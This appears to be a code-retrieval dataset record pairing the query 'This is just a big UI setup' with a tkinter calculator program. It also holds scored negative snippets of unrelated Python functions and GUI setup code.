settings.BILLING_DEFAULT_PLAN_NAME:\n included = OFFICIAL_BUILDER_LIMITS[source]\n return overage, included", "def get_frame_range(self):\n raise NotImplementedError(\"get_frame_range is not implemented\")", "def range(self) -> Tuple[Union[int, float], Union[int, float]]:\n return self._range", "def f_get_range(self, copy=True):\n if not self.f_has_range():\n raise TypeError(\n \"Your parameter `%s` is not array, so cannot return array.\"\n % self.v_full_name\n )\n elif copy:\n return self._explored_range[:]\n else:\n return self._explored_range", "def get_range(self):\n if self.battery_size == 75:\n car_range = 260\n elif self.battery_size == 100:\n car_range = 315\n \n print(f\"This car can run for {car_range} miles.\")", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def get_start_indef_range(start: int) -> models.IndefiniteRange:\n return models.IndefiniteRange(value=start - 1, comparator=\"<=\",\n type=\"IndefiniteRange\")", "def get_range_value(self, key):\n pass", "def suggested_retirement_income(self, request, parent_lookup_client, pk, format=None):\n # TODO: Make this work\n return Response(1234)", "def range(self) -> str:\n return f\"{self.name}!A:F\"", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def view(self, flow=False):\n return _to_view(self._hist.view(flow))", "def range(self):\n return self._upper - self._lower", "def get_gain_range(self, *args):\n return _uhd_swig.usrp_source_sptr_get_gain_range(self, *args)", "def get_income_fields():\n less_than_30k_fields = [\n 'B19001_002E', #\tLess than $10,000\t\n 'B19001_003E', #\t$10,000 to $14,999\t\n 'B19001_004E', #\t$15,000 to $19,999\t\n 'B19001_005E', #\t$20,000 to $24,999\t\n 'B19001_006E', #\t$25,000 to $29,999\t\n ]\n inc_30k_to_39k_fields = [\n 'B19001_007E', #\t$30,000 to $34,999\t\n 'B19001_008E', #\t$35,000 to 
$39,999\n ]\n inc_40k_to_49k_fields = [\n 'B19001_009E', #\t$40,000 to $44,999\t\n 'B19001_010E', #\t$45,000 to $49,999 \n ]\n inc_50k_to_74k_fields = [\n 'B19001_011E', #\t$50,000 to $59,999\t\n 'B19001_012E', #\t$60,000 to $74,999\n ]\n inc_75k_to_99k_fields = [\n 'B19001_013E' #\t$75,000 to $99,999\n ]\n inc_100k_to_149k_fields = [\n 'B19001_014E', #\t$100,000 to $124,999\t\n 'B19001_015E', #\t$125,000 to $149,999\t\n ]\n inc_150k_plus_fields = [\n 'B19001_016E', #\t$150,000 to $199,999\t\n 'B19001_017E', #\t$200,000 or more\n ]\n\n income_fields = OrderedDict()\n income_fields[ 'less_than_30k' ] = { 'label': '<$30,000', 'fields': less_than_30k_fields }\n income_fields[ 'inc_30k_to_39k' ] = { 'label': '$40,000 to $49,999', 'fields': inc_30k_to_39k_fields }\n income_fields[ 'inc_40k_to_49k' ] = { 'label': '$40,000 to $49,999', 'fields': inc_40k_to_49k_fields }\n income_fields[ 'inc_50k_to_74k' ] = { 'label': '$50,000 to $74,999', 'fields': inc_50k_to_74k_fields }\n income_fields[ 'inc_75k_to_99k' ] = { 'label': '$75,000 to $99,999', 'fields': inc_75k_to_99k_fields }\n income_fields[ 'inc_100k_to_149k' ] = { 'label': '$100,000 to $149,999', 'fields': inc_100k_to_149k_fields }\n income_fields[ 'inc_150k_plus' ] = { 'label': '$150,000+', 'fields': inc_150k_plus_fields }\n\n return income_fields", "def list(self, request, scope=None):\n\n qs = self.get_queryset()\n if scope == 'summary':\n total = qs.aggregate(total=Sum('total_value'))['total'] or 0.0\n return Response({'total_investment': total}, status=200)\n else:\n serializer = self.get_serializer(qs, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)", "def __json__(self, request=None):\n # start = self.start.isoformat() if self.start else None\n # end = self.end.isoformat() if self.end else None\n return dict(\n timeref_type=\"daterange\",\n interval=self.interval,\n start=self.start.isoformat(),\n end=self.end.isoformat(),\n )", "def _get_min_expense(self):\n pass", "def provider_range_lookup(self, record):\n pass" ]
[ "0.5824725", "0.5612662", "0.55873716", "0.54605365", "0.54605365", "0.5444421", "0.5324229", "0.5322225", "0.5300629", "0.5277442", "0.5269223", "0.5262803", "0.5230335", "0.52228105", "0.5218109", "0.51848346", "0.5179088", "0.51768607", "0.5176457", "0.51640767", "0.51595587", "0.5153438", "0.51508856", "0.5130879", "0.51223975", "0.5076467", "0.50653094", "0.5058624", "0.5058521", "0.50528425", "0.50424135", "0.5038926", "0.5022902", "0.49918702", "0.49810165", "0.49601832", "0.49539348", "0.49464768", "0.4941292", "0.4931997", "0.49276793", "0.4911075", "0.49029136", "0.49028605", "0.49028015", "0.49025145", "0.48853308", "0.4882531", "0.48816955", "0.4877526", "0.48731557", "0.4855839", "0.48545417", "0.48509085", "0.48460716", "0.48233867", "0.4821615", "0.48211873", "0.4817077", "0.48167542", "0.48139924", "0.48092324", "0.48059148", "0.47998434", "0.47839877", "0.4777155", "0.47654146", "0.47636932", "0.4756754", "0.4754899", "0.4754899", "0.4754899", "0.4754899", "0.4754322", "0.47519866", "0.47431228", "0.47428122", "0.4738438", "0.47277197", "0.47263256", "0.47258902", "0.4718425", "0.47149432", "0.47076297", "0.4704196", "0.4703901", "0.46999612", "0.46931824", "0.46891353", "0.46870142", "0.4676462", "0.46720225", "0.46676034", "0.46675956", "0.46622282", "0.46533865", "0.46516693", "0.4650772", "0.46506947", "0.46444535" ]
0.700728
0
This is just a big UI setup
def main(): #------------------------------------- Functions def add(text): """ This will add to the display, and be the go to function of most buttons. We'll want to add in conditions for what buttons go. """ orig = dispb["text"] new = orig + text ops = ["+","-","*","/"] # conditions # length 21 if len(new) > 21: dispb["text"] = orig return 0 # one calc at a time if len(orig) > 0: if (orig[-1] in ops) & (text in ops): dispb["text"] = orig return 0 dispb["text"] = new return 0 def clear(): dispb["text"] = "" return 0 def backspace(): dispb["text"] = dispb["text"][:len(dispb["text"])-1] return 0 def equals(): try: dispb["text"] = str(eval(dispb["text"])) except: dispb["text"]="ERROR, clear display" #------------------------------------- UI # title and start calc = tk.Tk() calc.title("Calculator") # size calc.geometry("255x235") #calc.columnconfigure(range(3), weight=1, minsize=50) #calc.rowconfigure(range(1,4), weight=1, minsize=48) # Icon calc.iconbitmap('Icon.ico')#'Icon.ico') calcarea = tk.Frame(master=calc) calcarea.pack(padx=5, pady=10) # display box disp = tk.Frame( master = calcarea ) disp.grid(row = 0, column = 0, columnspan = 3) dispb = tk.Label( master = disp, text = '', fg = 'black', bg = 'white', borderwidth = 1, relief = 'solid', height = 2, width = 19 ) dispb.pack() # number buttons num1 = tk.Frame( master=calcarea ) num1.grid(row = 3, column = 0) num1b = tk.Button( master = num1, text = 1, width = 5, height = 2, command = lambda: add("1") ).pack() # the pack is what adds it to the UI # two num2 = tk.Frame( master=calcarea ) num2.grid(row = 3, column = 1) num2b = tk.Button( master = num2, text = "2", width = 5, height = 2, command = lambda: add("2") ).pack() # three num3 = tk.Frame( master=calcarea ) num3.grid(row = 3, column = 2) num3b = tk.Button( master = num3, text = "3", width = 5, height = 2, command = lambda: add("3") ).pack() # four num4 = tk.Frame( master=calcarea ) num4.grid(row = 2, column = 0) num4b = tk.Button( master = num4, text = "4", width = 5, height = 2, command = lambda: add("4") ).pack() # five num5 = tk.Frame( master=calcarea ) num5.grid(row = 2, column = 1) num5b = tk.Button( master = num5, text = "5", width = 5, height = 2, command = lambda: add("5") ).pack() # six num6 = tk.Frame( master=calcarea ) num6.grid(row = 2, column = 2) num6b = tk.Button( master = num6, text = "6", width = 5, height = 2, command = lambda: add("6") ).pack() # seven num7 = tk.Frame( master=calcarea ) num7.grid(row = 1, column = 0) num7b = tk.Button( master = num7, text = "7", width = 5, height = 2, command = lambda: add("7") ).pack() # eight num8 = tk.Frame( master=calcarea ) num8.grid(row = 1, column = 1) num8b = tk.Button( master = num8, text = "8", width = 5, height = 2, command = lambda: add("8") ).pack() # nine num9 = tk.Frame( master=calcarea ) num9.grid(row = 1, column = 2) num9b = tk.Button( master = num9, text = "9", width = 5, height = 2, command = lambda: add("9") ).pack() # zero num0 = tk.Frame( master = calcarea ) num0.grid(row = 4, column = 0) num0b = tk.Button( master = num0, text = 0, width = 5, height = 2, command = lambda: add("0") ).pack() # period dot = tk.Frame( master = calcarea ) dot.grid(row = 4, column = 1) dotb = tk.Button( master = dot, text = ".", width = 5, height = 2, command = lambda: add(".") ).pack() # equal sign eq = tk.Frame( master = calcarea ) eq.grid(row = 4, column = 2, columnspan = 2) eqb = tk.Button( master = eq, text = "=", width = 11, height = 2, command = equals ).pack() # plus sign plus = tk.Frame( master = calcarea ) plus.grid(row = 
3, column = 4, rowspan = 2) plusb = tk.Button( master = plus, text = "+", width = 5, height = 5, command = lambda: add("+") ).pack() # minus sign minu = tk.Frame( master = calcarea ) minu.grid(row = 3, column = 3) minub = tk.Button( master = minu, text = "-", width = 5, height = 2, command = lambda: add("-") ).pack() # multiplication mult = tk.Frame( master = calcarea ) mult.grid(row = 2, column = 3) multb = tk.Button( master = mult, text = "*", width = 5, height = 2, command = lambda: add("*") ).pack() # division div = tk.Frame( master = calcarea ) div.grid(row = 2, column = 4) divb = tk.Button( master = div, text = "/", width = 5, height = 2, command = lambda: add("/") ).pack() # left parentheses lefp = tk.Frame( master = calcarea ) lefp.grid(row = 1, column = 3) lefpb = tk.Button( master = lefp, text = "(", width = 5, height = 2, command = lambda: add("(") ).pack() # right paraentheses rigp = tk.Frame( master = calcarea ) rigp.grid(row = 1, column = 4) rigpb = tk.Button( master = rigp, text = ")", width = 5, height = 2, command = lambda: add(")") ).pack() # Clear button Clr = tk.Frame( master = calcarea ) Clr.grid(row = 0, column = 3) Clrb = tk.Button( master = Clr, text = "C", width = 5, height = 2, command = clear ).pack() # backspace bck = tk.Frame( master = calcarea ) bck.grid(row = 0, column = 4) bckb = tk.Button( master = bck, text = "\N{RIGHTWARDS BLACK ARROW}", width = 5, height = 2, command = backspace ).pack() # This is what kicks the whole thing off, lets it wait for commands. calc.mainloop()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def prepare_UI(self):", "def create_widgets(self):", "def init_ui(self):\n raise NotImplementedError", "def init_ui(self):\n raise NotImplementedError", "def init_widget(self):", "def mainWidget(self):\n raise RuntimeError('Not implemented')", "def create_widgets( self ):", "def init_UI(self):\n\n self.master.title(\"Search for different companies\")\n self.master.geometry(\"400x400\")\n\n self.label_combobox = Label(self, text=\"Search by\")\n self.label_combobox.pack()\n\n self.combo_searching_options = Combobox(self, state=\"readonly\")\n self.combo_searching_options['values'] = self.combobox_values\n self.combo_searching_options.pack()\n\n self.label_input = Label(self, text=\"Entry the value\")\n self.label_input.pack()\n\n self.user_input = Entry(self, width=40)\n self.user_input.pack()\n\n self.btn_submit = Button(self, text=\"Submit\", command=self.submit)\n self.btn_submit.pack()\n\n self.text_area = scrolledtext.ScrolledText(self)\n self.text_area.pack()\n\n sys.stdout = RedirectOutputText(self.text_area)\n\n self.btn_back = Button(self, text=\"Back\", command=self.go_back)\n self.btn_back.pack()", "def ui(self):\n return ui", "def _init_ui(self):\r\n\t\t\r\n\t\tself.input_frame = Input(self)\r\n\t\tself.input_frame.pack()\r\n\t\t\r\n\t\tbutton_ok = Button(self, text = \"Ping\", command = self._go)\r\n\t\tbutton_ok.pack()\r\n\t\t\r\n\t\tself.result_frame = Result(self)\r\n\t\tself.result_frame.pack()", "def init_ui(self):\n raise NotImplementedError(\"This is an abstract method.\")", "def __init__(self):\r\n super().__init__()\r\n self.init_ui()", "def view(self):", "def _initUI(self) -> None:\n self._createActions()\n self._addActionsToMoveButtons()\n self._createToolBar()\n self._createStatusBar()\n self._createMainContextMenu()", "def getWidget(self):", "def init_ui(self):\n # Create GUI elements, set them in dict structure\n labelwidth = 150\n\n # Add parameter line edit for Factor Tm to Tp\n\n # Add line edit with browsebutton for swan result folder\n self.input_elements['hares folder'] = widgets.ExtendedLineEdit(\n label='HARES uitvoerbestanden folder:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_hares_folder)\n )\n\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.layout().setSpacing(10)\n\n for _, item in self.input_elements.items():\n self.layout().addWidget(item)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.layout().addWidget(line)\n\n # OK and Cancel buttons\n self.generateButton = QtWidgets.QPushButton('Start lezen uitvoerbestanden')\n self.generateButton.setDefault(True)\n self.generateButton.clicked.connect(self.generate)\n\n self.cancelButton = QtWidgets.QPushButton('Annuleren')\n self.cancelButton.setAutoDefault(False)\n self.cancelButton.clicked.connect(self.cancel)\n\n button_box = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal, self)\n button_box.addButton(self.generateButton, QtWidgets.QDialogButtonBox.ActionRole)\n button_box.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)\n button_box.accepted.connect(QtWidgets.QDialog.accept)\n\n self.layout().addWidget(button_box)", "def widgets(self):\r\n self.setWindowTitle(\"PyCrypt\")\r\n self.setMinimumSize(QSize(500, 500))\r\n self.setMaximumSize(QSize(500, 500))\r\n# Adding the sub def for widgets etc\r\n self.add_menus_and_status()\r\n self.add_buttons()", "def init_ui(self):\n self.master.title(\"Backbone\")\n self.master.geometry(\"300x150\")\n\n 
self.pack(fill=BOTH, expand=1)\n\n self.btn_upload_file = Button(self, text=\"Upload file\", command=self.upload_file)\n self.btn_upload_file.place(x=90, y=10)\n\n self.btn_create_training_file = Button(self, text=\"Create & upload training file\",\n command=self.create_training_file)\n self.btn_create_training_file.place(x=30, y=40)\n\n self.btn_run_algorithm = Button(self, text=\"Run algorithm\", command=self.run_algorithm)\n self.btn_run_algorithm.place(x=80, y=70)\n\n self.btn_view_results = Button(self, text=\"View Results\", command=self.view_results)\n self.btn_view_results.place(x=85, y=100)", "def inicialUI(self):\r\n\r\n self.setGeometry(500, 500, 500, 500)\r\n self.setWindownTitle(\"Pesquisa\")\r\n self.displayWidgets()\r\n\r\n self.show()", "def set_ui(self):\r\n\r\n self.canvas = tk.Canvas(self)\r\n self.canvas.pack()\r\n\r\n self.entry = ttk.Entry(self.canvas, justify=\"center\", font=(\"Calibri\", 12))\r\n\r\n self.grid = Grid(self.canvas)", "def init_ui(self):\n self.parent.title(\"Roku Player Controller\")\n self.style.theme_use(\"default\")", "def show(self):", "def setUp(self):\n self.ui = UI()", "def init_UI(self):\n\n self.master.title(\"Create and upload training file\")\n self.master.geometry('400x400')\n\n self.text_area = scrolledtext.ScrolledText(self)\n self.text_area.pack()\n\n self.user_input = Entry(self, width=10)\n self.user_input.pack()\n\n sys.stdout = RedirectOutputText(self.text_area)\n\n self.create_uncertain_pairs_file()\n\n self.console_label = ConsoleLabel(self.get_uncertain_pairs_file())\n self.current_record_pair = self.console_label.get_uncertain_pair()\n\n self.btn_next = Button(self, text=\"Next\", bg=\"green\", command=self.get_input)\n self.btn_next.pack()\n\n self.back = Button(self, text=\"Back\", command=self.go_back)\n self.back.pack()", "def setup(self):\n self.ui_manager.purge_ui_elements()\n y_slot = self.window.height // 12\n\n ui_input_box = arcade.gui.UIInputBox(\n center_x=self.window.width // 2,\n center_y=y_slot * 7,\n width=250\n )\n ui_input_box.set_style_attrs(\n bg_color=(66, 179, 208),\n bg_color_hover=(112, 212, 238),\n bg_color_focus=(255, 228, 14)\n )\n ui_input_box.text = self.name\n ui_input_box.cursor_index = len(ui_input_box.text)\n self.ui_manager.add_ui_element(ui_input_box)\n\n button = buttons.ExitButton(\n 'Exit',\n center_x=self.window.width // 2,\n center_y=y_slot * 1,\n width=250\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(135, 21, 25),\n bg_color_press=(122, 21, 24),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.AuthorButton(\"Author\",\n center_x=self.window.width // 2,\n center_y=y_slot * 2,\n width=250,\n user=ui_input_box\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.ResultButton(\"Results\",\n center_x=self.window.width // 2,\n center_y=y_slot * 3,\n width=250,\n user=ui_input_box,\n level = \"level1\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.RulesButton(\"Rules\",\n center_x=self.window.width // 2,\n center_y=y_slot * 4,\n width=250,\n user=ui_input_box\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.LevelButton(\"Play level 1\",\n 
center_x=self.window.width // 2,\n center_y=y_slot * 6,\n width=250,\n user=ui_input_box,\n level=\"level1\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)\n\n button = buttons.LevelButton(\"Play level 2\",\n center_x=self.window.width // 2,\n center_y=y_slot * 5,\n width=250,\n user=ui_input_box,\n level = \"level2\"\n )\n button.set_style_attrs(\n bg_color=(51, 139, 57),\n bg_color_hover=(88, 196, 96),\n bg_color_press=(28, 71, 32),\n )\n self.ui_manager.add_ui_element(button)", "def make_form(self):", "def initUI(self):\n # Setting the main layout as Vertical.\n self.mainLayout = QHBoxLayout()\n\n # Create title.\n self.title = QLabel(self.__name + \" : \")\n\n # Add description as tooltip.\n self.title.setToolTip(self.__description)\n\n # Add title to main layout.\n self.mainLayout.addWidget(self.title)\n\n # Create ComboBox.\n self.dropDown = QComboBox()\n\n # Add datas to drop down.\n self.dropDown.addItems(self.__datas)\n\n # Set default index to dropdown.\n self.dropDown.setCurrentIndex(self.__currentValue)\n\n # Connect dropdown with update method.\n self.dropDown.currentIndexChanged.connect(self.changeCurrentValue)\n\n # Add ComboBox to main layout.\n self.mainLayout.addWidget(self.dropDown)\n\n # Add the main layout to the window.\n self.setLayout(self.mainLayout)", "def initUI(self):\n\n lbl_names = ['Название проекта', 'Версия', 'Директория', 'Описание', 'Автор', 'Почта', 'Дополнительные зависимости', 'Название ноды']\n param_list = ['motor_driver', '0.0.0', '/home/mitya/catkin_ws/src/', 'The motor_driver package', 'D. Potapov',\n 'potapov627@yandex.ru', 'nav_msgs, geometry_msgs, tf, ', 'motor_driver_node']\n labels = []\n for name in lbl_names:\n labels.append(QLabel(name))\n for i, ph in zip(range(len(labels)), param_list):\n ed_line = QLineEdit()\n if i == 1:\n ed_line.setValidator(QRegExpValidator(QRegExp(\"^([0-9\\.])*[0-9]$\")))\n elif i == 5:\n ed_line.setValidator(QRegExpValidator(QRegExp(\"^([a-z0-9_-]+\\.)*[a-z0-9_-]+@[a-z0-9_-]+(\\.[a-z0-9_-]+)*\\.[a-z]{2,6}$\")))\n ed_line.setPlaceholderText(ph)\n if i != 0:\n ed_line.textEdited.connect(self.change_data)\n else:\n ed_line.textEdited.connect(self.change_pkg_name)\n self.full_ed_lines.append(ed_line)\n grid = QGridLayout()\n grid.setSpacing(5)\n for i in range(1, len(labels) + 1):\n for j in range(0, 2):\n if j == 0:\n grid.addWidget(labels[i - 1], i, j)\n else:\n grid.addWidget(self.full_ed_lines[i - 1], i, j)\n ch_dirButton = QPushButton(self)\n ch_dirButton.setIcon(QIcon('./icons/open_folder.png'))\n ch_dirButton.clicked.connect(self.ch_dirDialog)\n grid.addWidget(ch_dirButton, 3, 3)\n genButton = QPushButton(\"Сгенерировать\")\n genButton.clicked.connect(self.generate)\n grid.addWidget(genButton, len(labels) + 2, 1)\n self.setLayout(grid)\n self.setMinimumSize(700, 400)\n self.show()", "def render(self):", "def init_ui(self):\n # Create GUI elements, set them in dict structure\n labelwidth = 150\n\n # Add parameter line edit for Factor Tm to Tp\n self.input_elements['factor Tm Tp'] = widgets.ParameterInputLine(\n label='Factor Tm naar Tp:',\n labelwidth=labelwidth,\n unitlabel='(NVT: Tp aanwezig)' if 'Tp' in self.hydraulic_loads.columns else '',\n validator=QtGui.QDoubleValidator(0.01, 99.99, 20),\n )\n\n if 'Tp' in self.hydraulic_loads.columns or self.parent_tab.step != 'I1':\n self.input_elements['factor Tm Tp'].set_enabled(False)\n\n # Add line edit with browsebutton for Master template\n 
self.input_elements['mastertemplate'] = widgets.ExtendedLineEdit(\n label='Master template bestand:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_master_template)\n )\n\n # Add line edit with browsebutton for depth file\n self.input_elements['depthfile'] = widgets.ExtendedLineEdit(\n label='Bathymetry bestand:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_bathymetry_file)\n )\n\n # Add line edit with browsebutton for swan result folder\n self.input_elements['swanfolder'] = widgets.ExtendedLineEdit(\n label='SWAN uitvoer folder:',\n labelwidth=labelwidth,\n browsebutton=QtWidgets.QPushButton('...', clicked=self.select_swan_folder)\n )\n\n\n self.setLayout(QtWidgets.QVBoxLayout())\n self.layout().setSpacing(10)\n\n for _, item in self.input_elements.items():\n self.layout().addWidget(item)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.layout().addWidget(line)\n\n # OK and Cancel buttons\n self.generateButton = QtWidgets.QPushButton('Genereer invoer')\n self.generateButton.setDefault(True)\n self.generateButton.clicked.connect(self.generate)\n\n self.cancelButton = QtWidgets.QPushButton('Annuleren')\n self.cancelButton.setAutoDefault(False)\n self.cancelButton.clicked.connect(self.cancel)\n\n button_box = QtWidgets.QDialogButtonBox(QtCore.Qt.Horizontal, self)\n button_box.addButton(self.generateButton, QtWidgets.QDialogButtonBox.ActionRole)\n button_box.addButton(self.cancelButton, QtWidgets.QDialogButtonBox.RejectRole)\n button_box.accepted.connect(QtWidgets.QDialog.accept)\n\n self.layout().addWidget(button_box)", "def main():\r\n return render_template(\"UI.html\")", "def setup_additional_ui(self):\n\n #set title\n self.setWindowTitle(self.title)\n\n #set question\n self.lbl_question.setText(self.question)\n\n #set_remember_choice\n self.set_remember_choice(self.chkbx_remember_choice.isChecked())", "def _setup_ui(self):\n\n self.window = ui.Widget()\n self.window.dimensions = ui.normalize_dimension((\n 0, 0,\n self.normalized_screen_resolution[0],\n self.normalized_screen_resolution[1]\n ))\n self.window.background_color = ImageColor.getcolor('#000000', 'RGB')\n\n interface_frame = ui.Widget(parent=self.window)\n interface_frame.dimensions = ui.normalize_dimension((\n self.preview_renderer.window[2],\n 0,\n self.normalized_screen_resolution[0] - self.preview_renderer.window[2],\n self.normalized_screen_resolution[1]\n ))\n interface_frame.background_color = ImageColor.getcolor('#ffffff', 'RGB')\n\n number = ui.LabelWidget(\"\",\n name=NAME_GET_STARTED,\n parent=interface_frame,\n align=\"center\",\n font_color=(0, 0, 0, 255))\n number.dimensions = (\n 5, 5,\n interface_frame.width - 10,\n interface_frame.height - 10\n )", "def initUI(self):\n\n self.wid = RosGenWidget()\n self.setCentralWidget(self.wid)\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&Файл')\n editMenu = menubar.addMenu('&Редактирование')\n self.create_menu_par('Менеджер подписчиков и издателей', self.wid.show_manager, fileMenu, 'Ctrl+M')\n self.create_menu_par('Очистить', self.wid.clear_all_lines, editMenu, 'Ctrl+D')\n self.create_menu_par('Загрузить данные из...', self.wid.open_fileDialog, fileMenu, 'Ctrl+F')\n self.create_menu_par('Сохранить как...', self.wid.save_fileDialog, fileMenu, 'Ctrl+S')\n self.create_menu_par('Выход', self.exit_app, fileMenu, 'Esc')\n self.statusbar = self.statusBar()\n self.statusbar.showMessage('Ожидание 
данных')\n self.wid.msg2Statusbar[str].connect(self.statusbar.showMessage)\n self.setGeometry(600, 200, 700, 400)\n self.setWindowTitle('Генератор шаблонов ROS-приложения')\n self.show()", "def build(self):", "def build(self):", "def build(self):", "def show(self) -> None:", "def setup(self):\n self.ui.setup_window()", "def init_ui(self):\n\n self.master.title(\"Upload file\")\n self.master.geometry(\"300x200\")\n\n self.pack(fill=BOTH, expand=1)\n\n self.btn_select_file = Button(self, text=\"Select file\", command=self.on_open)\n self.btn_select_file.place(x=80, y=50)\n\n self.selected_file_name = Label(self, text=\"<Selected file name>\")\n self.selected_file_name.place(x=60, y=90)\n\n self.btn_upload_file = Button(self, text=\"Upload file\", command=self.upload_file)\n self.btn_upload_file.place(x=80, y=130)\n\n self.btn_back = Button(self, text=\"Back\", command=self.go_back)\n self.btn_back.place(x=10, y=10)", "def _initUI(self):\n\n vlayout = QtWidgets.QVBoxLayout()\n\n # Description\n #----------------------------------------------------------------\n hlayout = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel()\n label.setText('Locatie:')\n label.setFixedWidth(100)\n hlayout.addWidget(label)\n\n label = QtWidgets.QLabel()\n label.setText(self.name)\n hlayout.addWidget(label)\n hlayout.setSpacing(10)\n\n vlayout.addLayout(hlayout)\n\n # Exportnaam\n #----------------------------------------------------------------\n self.exportname = ParameterInputLine(label='Exportnaam:', labelwidth=100)\n self.exportname.LineEdit.setMinimumWidth(200)\n vlayout.addLayout(self.exportname.layout)\n\n # Exportdatabase\n #----------------------------------------------------------------\n self.exportpath = ExtendedLineEdit(label='SQLite-database:', labelwidth=100, browsebutton=True)\n self.exportpath.BrowseButton.clicked.connect(self._get_path_database)\n vlayout.addLayout(self.exportpath.layout)\n\n # Line\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n # Buttons\n #----------------------------------------------------------------\n hbox = QtWidgets.QHBoxLayout()\n hbox.addItem(QtWidgets.QSpacerItem(0, 0, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Maximum))\n # Add ok/close\n self.closebutton = QtWidgets.QPushButton('Sluiten')\n self.closebutton.clicked.connect(self.close)\n hbox.addWidget(self.closebutton)\n # Add ok/close\n self.savebutton = QtWidgets.QPushButton('Opslaan')\n self.savebutton.clicked.connect(self._save)\n hbox.addWidget(self.savebutton)\n\n vlayout.addLayout(hbox)\n\n # Add layout to widget\n self.setLayout(vlayout)", "def _setupUi(self):\n self.setupUi(self)\n self.twTree.setStyleSheet(\"background-color: rgb(200, 200, 200)\")", "def controls_setup(self):\n pass", "def __init__(self, ui: UI):\n super().__init__(ui)", "def create_widget(self):\n pass", "def __init__(self, parent=None):\n super(Representative, self).__init__(parent)\n self.setupUi(self)", "def __setup_ui(self):\n self.pixel_label = QLabel(\"\", self)\n self.pixel_label.setFixedWidth(100)\n self.pixel_coords_label = QLabel(\"\", self)\n self.statusBar().addPermanentWidget(self.pixel_coords_label)\n self.statusBar().addPermanentWidget(self.pixel_label)\n\n self.current_fps_label = QLabel(\"\", self)\n self.statusBar().addPermanentWidget(self.current_fps_label)\n\n self.toolbar = self.addToolBar(\"default\")\n self.toolbar.setMovable(False)\n self.setContextMenuPolicy(Qt.NoContextMenu)\n\n exit_act = 
